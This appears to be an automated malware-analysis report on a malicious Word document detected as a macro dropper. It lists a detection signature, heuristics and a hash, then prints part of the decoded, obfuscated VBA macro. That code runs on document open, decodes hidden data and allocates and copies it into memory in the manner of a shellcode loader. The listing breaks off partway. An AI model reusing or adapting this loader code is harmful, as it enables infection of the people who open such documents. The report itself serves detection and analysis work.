Verdict: MALICIOUS
Risk Score: 122
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
ClamAV identifies the sample as malicious with the signature 'Doc.Dropper.Agent-6591342-0'. The document carries a VBA project that includes a Document_Open macro, a common technique for running code automatically as soon as the document is opened. The macro's intent is to download and execute a second-stage payload, as indicated by the heuristic firings and by the dropper classification of the signature.
Heuristics (4)
- ClamAV: Doc.Dropper.Agent-6591342-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Dropper.Agent-6591342-0
- VBA macros detected [medium, OLE_VBA_MACROS, 1 related finding]: Document contains VBA macro code
- Document_Open macro [high, OLE_VBA_DOCOPEN]: Document_Open macro
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/camera-raw-settings/1.0/ (in document text, OLE body)
  - http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
  - http://purl.org/dc/elements/1.1/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
  - http://www.iec.ch (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4821 bytes |

SHA-256 of macros.bas: affe4766f9ca40c27a4494be7e02388ecfe94ef5a2bdd017c2978f3e125ae4f9
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Dim pokeweed As Integer
Dim capillament As String
Dim confined
Dim ensue
Dim anisogamic As Long
Dim buchloe
Dim averment
Function anointment(cities, righthander)
    Dim passion As Variant
    Dim aire As Long
    capillament = "bewilderment"
    Dim bever As Variant
    Dim tenpin As Long
    Dim aquifer As Integer
    Dim mussel As String
    Dim leveler As Long
    kyles tenpin, ByVal VarPtr(righthander) + 8, 4
    anisogamic = anisogamic - 453
    leveler = cities
    offer = 92
    tyrannis = 51
    If offer + tyrannis < 10 Then
        offer = "di" & RightB$("penniastole", 6)
        pokeweed = averment + 202
        oversolicitous = "haem" & Mid("coniformoproteluggage", 9, 6) & LCase("IdAE")
    Else
        averment = pokeweed And 402
        tyrannis = 41
    End If
    kyles ByVal leveler, ByVal tenpin, 48 + 3251
    anisogamic = ensue And 294
End Function
Sub pageNumber()
    ActiveDocument.Sections(ActiveDocument.Sections.Count) _
        .Headers(wdHeaderFooterPrimary).Range.Select
    With Selection
        .Paragraphs(1).Alignment = wdAlignParagraphCenter
        .TypeText Text:="Page "
        .Fields.Add Range:=Selection.Range, Type:=wdFieldEmpty, Text:= _
            "PAGE ", PreserveFormatting:=True
        .TypeText Text:=" of "
        .Fields.Add Range:=Selection.Range, Type:=wdFieldEmpty, Text:= _
            "NUMPAGES ", PreserveFormatting:=True
    End With
End Sub
Private Sub Document_Open()
    Dim levee As Long
    Dim acres As Long
    razorback = "backhand"
    bibliotist
    For crosshead = 32 To 67
        pinion = 67
        capillament = "personification"
        highspiritedness = "art" & Left("illerfrostbound", 5) & RightB$("azotemicy", 1)
        highspiritedness = LCase("CO") & "ntemptibly"
    Next crosshead
End Sub
Function monopolization(hoppedup)
    serviceman = "falsehood"
    samarkand = "analyze"
    monopolization = RtlAllocateHeap(hoppedup, 0, 3299)
End Function
Sub bibliotist()
    Dim brioche As Long
    Dim whet As Integer
    gavialidae = faithlessness.schismatically.ukraine.ControlTipText
    geliebet = 4288
    cubical = Right(gavialidae, geliebet)
    litterer = accountable.animative(cubical)
    imitative = 8
    While imitative < 11
        melosa = "simplified"
        imitative = imitative + 1
        ensue = averment * 1
    Wend
    attacking = "soimemefrench"
    thyroidectomy = "carpe"
    #If Win64 Then
        Dim instructorship As Long
        Dim marginality As delicatessen
        Dim hausmannite As LongPtr
        marginality.header = 0
        Dim scombridae As Long
    #Else
        Dim anisotropic As Byte
        marginality = 0
        Dim spiel As Byte
        Dim hausmannite As Long
    #End If
    footboy = 0
    referable = "childhood"
    ablutionary = 139 + 3957
    simulium = 88
    expulsion = 57
    If simulium + expulsion < 31 Then
        simulium = Mid("biotaxykibuilt", 8, 2) & RightB$("pelliculariadding", 5)
        confined = "spinach"
        batwing = Mid("moiderbrointerlocution", 7, 3) & Mid("homelyadloomawayness", 7, 6)
    Else
        buchloe = buchloe
        expulsion = 65
    End If
    doublek = 177 + 261967
    backlog = circumduction(doublek, marginality, marginality)
    hausmannite = monopolization(backlog)
    ample = LCase("pro") & Left("bantudrycleaned", 5) & LCase("r")
    Dim bystander As String
    charge = "command"
    bystander = believe
    cassino = 10
    While cassino < 14
        hic = "roisterer"
        cassino = cassino + 1
        capillament = "bondswoman"
    Wend
    aristotelean = litterer
    nootka = "deciliter"
    anointment hausmannite, aristotelean
    pompom = LCase("dE") & RightB$("dodgefere", 4) & RightB$("mingnt", 2)
    #If Win64 Then
        Dim offset As Byte
        iodocompound = "boletellus"
        counteroffensive = "preraphaelite"
        secretariat = "antifungal"
        hevea = 36 + 540
    #ElseIf (Win32) Then
        ocarina = "contagiously"
        readiness = "eurydice"
        mariachi = "mullidae"
        resonance = 479 + 27
        hevea = resonance + 1698
    #End If
    Dim awlshaped As Long
    Dim furnished As Variant
    Dim pleasing As Long
    pleasing = 0
    Dim cnidaria As Long
    cnidaria = hausmannite + hevea
    annihilate
```

... (truncated)